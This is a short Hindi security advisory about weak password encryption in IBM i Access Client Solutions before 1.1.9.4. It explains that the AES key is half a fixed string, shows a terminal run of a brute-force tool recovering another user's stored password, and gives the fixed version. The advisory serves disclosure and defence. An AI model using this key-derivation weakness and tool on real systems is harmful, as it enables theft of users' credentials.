
IBM i Access Client Solutions < 1.1.9.4 - कमजोर पासवर्ड एन्क्रिप्शन
IBM i Access Client Solutions < 1.1.9.4 - कमज़ोर पासवर्ड एन्क्रिप्शन
IBM i Access Client Solutions उपयोगकर्ता पासवर्ड संग्रहीत करने के लिए AES एल्गोरिथ्म का उपयोग करता है, हालाँकि 16 बाइट्स की एन्क्रिप्शन कुंजी स्थिर स्ट्रिंग (Thanatos) और एक अन्य स्थिर स्ट्रिंग (Behemoth) से युक्त स्ट्रिंग से यादृच्छिक वर्णों का संयोजन है, जो उपयोगकर्ता नाम, उपयोगकर्ता के होम फ़ोल्डर, ओएस (उदाहरण के लिए Linux) और वर्तमान निर्देशिका के साथ संयुक्त होती है जहाँ एप्लिकेशन शुरू किया गया था। परिणामस्वरूप, एन्क्रिप्शन कुंजी का आधा भाग स्थिर (स्ट्रिंग Thanatos) होता है जबकि दूसरा आधा भाग बहुत सीमित होता है। इससे किसी हमलावर के लिए एकल CPU कोर पर भी पासवर्ड ब्रूट फोर्स करना बहुत आसान हो जाता है।
यहाँ mkubiak खाते से as400_password_bruteforce_tool.java स्क्रिप्ट का उपयोग करके mmajchrowicz उपयोगकर्ता के पासवर्ड डिक्रिप्शन का एक उदाहरण दिया गया है:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt
IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team
Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47
Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19
Found good pass: Thanatosaun/Lcmo
Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74
Decrypted system password: Pentest
यह समस्या कमज़ोर पासवर्ड एन्क्रिप्शन के अनुप्रयोग के कारण हुई थी। यह मुद्दा IBM i Access Client Solutions 1.1.9.4 में ठीक कर दिया गया है।
< 1.1.9.4
IBM i Access Client Solutions को 1.1.9.4 या नए संस्करण में अपडेट करें।